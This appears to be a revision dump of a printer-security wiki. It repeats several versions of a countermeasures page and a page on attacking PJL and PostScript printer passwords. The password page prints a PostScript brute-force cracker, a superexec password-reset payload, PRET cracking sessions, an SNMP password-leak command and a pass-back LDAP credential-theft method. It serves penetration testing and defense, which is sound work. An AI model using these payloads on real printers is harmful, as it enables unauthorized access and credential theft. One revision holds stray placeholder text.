will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software <ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. == Admins == Network administrators should never leave their printers accessible from the Internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. The print server should completely ignore PJL commands and convert PostScript code to another page description language or to a ‘defused’ version using CUPS' ''ps2write'' filter and disallow access to raw print queues. Printers should be completely sandboxed, isolating them from the rest of the network to mitigate the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below: [[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasures to sandbox printers]] Furthermore, if supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. == Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. ---- c90377d5a11a51beee49bf9e3ba34cca6bb51fe5 139 21 2017-01-14T20:14:07Z Admin 1 wikitext text/x-wiki Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks. == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software <ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. == Admins == Network administrators should never leave their printers accessible from the internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. If supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. == Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator as they may be traces of a [[cross site printing] attack. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. ---- 82ddfbbf54d8a24a352b4070b5ad54305e6f1fad 21 19 2016-12-19T16:44:26Z 134.147.128.156 0 wikitext text/x-wiki __FORCETOC__ Most attacks against printers are enabled because there is no clear distinction between [[page description]] and [[printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks. == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like PostScript from one day to the next would break compatibility with existing printer drivers and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented PJL extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their `hidden functions' and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software. <ref name="fsf">This issue has been discussed by the when HP announced to introduce code signing for their printers in 2011: `Fixing rogue printers: don't trade one security threat for another. [https://en.wikipedia.org/wiki/.avi link]</ref> Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by \cite{waechter2005chai} who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. == Admins == Network administrators should never leave their printers accessible from the internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. If supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. == Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. <ref name="Perry">Perry's Handbook, Sixth Edition, McGraw-Hill Co., 1984.</ref> <ref name=OEDComputer>{{Cite journal |title=computer, ''n.'' |series=Oxford English Dictionary |url=http://dictionary.oed.com/ |publisher=Oxford University Press |edition=2 |year=1989 |accessdate=10 April 2009 |ref=harv}}</ref> The Sun is pretty big.<ref>E. Miller, ''The Sun'', (New York: Academic Press, 2005), 23-5.</ref> The Moon, however, is not so big.<ref>''R. Smith, "Size of the Moon", ''Scientific American'', 46 (April 1978): 44-6.</ref> ==Notes== <references /> ab1f5eefa45aaec30ddd7e4dd53181aeae4aaa23 19 18 2016-11-25T19:37:19Z Admin 1 wikitext text/x-wiki Most attacks against printers are enabled because there is no clear distinction between [[page description]] and [[printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks. == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like PostScript from one day to the next would break compatibility with existing printer drivers and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented PJL extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their `hidden functions' and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software \footnote{This issue has been discussed by the when HP announced to introduce code signing for their printers in 2011: `Fixing rogue printers: don't trade one security threat for another', \url{https://www.fsf.org/blogs/licensing/restricted-printers}}. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by \cite{waechter2005chai} who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. == Admins == Network administrators should never leave their printers accessible from the internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. If supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. == Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. __FORCETOC__ 6db8b6feb865fbfe3452982e7a3ff6d6acba6d09 18 2016-11-25T19:21:09Z Admin 1 Created page with "== Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like PostScript from o..." wikitext text/x-wiki == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like PostScript from one day to the next would break compatibility with existing printer drivers and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented PJL extensions, service codes and further proprietary features. In general, we have the impression that there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their `hidden functions' and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. == Admins == Network administrators should never leave their printers accessible from the internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. If supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. == Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. 7ff993c69f7dfea0788d026225b5a44944a33e67 0 34 649 608 2017-11-22T12:01:29Z Admin 1 wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model-specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65,535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65,535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,535 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all. Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (<code>1183615869</code>, see <ref>''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec & the pdfmark Instruction Set]'', D. Lancaster, 2002</ref>). Wrapping PostScript code into ''superexec'' allows an attacker to ignore various protection mechanisms of the language, which would normally raise an ''invalidaccess'' error. This can be used to set PostScript passwords without initially submitting the current password as shown below: <syntaxhighlight lang=postscript> { << /SystemParamsPassword (0) /StartJobPassword (0) >> setsystemparams } 1183615869 internaldict /superexec get exec </syntaxhighlight> '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Device unlocked with password: 999 printer:/> lock S0me_Re4lly_g00d_Passw0rd! printer:/> unlock bypass Resetting password to zero with super-secret PostScript magic Device unlocked with password: 0 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- 7892a638a4ee00326614d26a12e5a5e019e30df1 608 605 2017-02-08T15:55:07Z Admin 1 wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model-specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all. Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (<code>1183615869</code>, see <ref>''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec & the pdfmark Instruction Set]'', D. Lancaster, 2002</ref>). Wrapping PostScript code into ''superexec'' allows an attacker to ignore various protection mechanisms of the language, which would normally raise an ''invalidaccess'' error. This can be used to set PostScript passwords without initially submitting the current password as shown below: <syntaxhighlight lang=postscript> { << /SystemParamsPassword (0) /StartJobPassword (0) >> setsystemparams } 1183615869 internaldict /superexec get exec </syntaxhighlight> '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Device unlocked with password: 999 printer:/> lock S0me_Re4lly_g00d_Passw0rd! printer:/> unlock bypass Resetting password to zero with super-secret PostScript magic Device unlocked with password: 0 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- 38fa07eb57f9c08a248e1493d0e77004d2e5b758 605 604 2017-02-08T13:02:36Z 92.228.38.179 0 wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 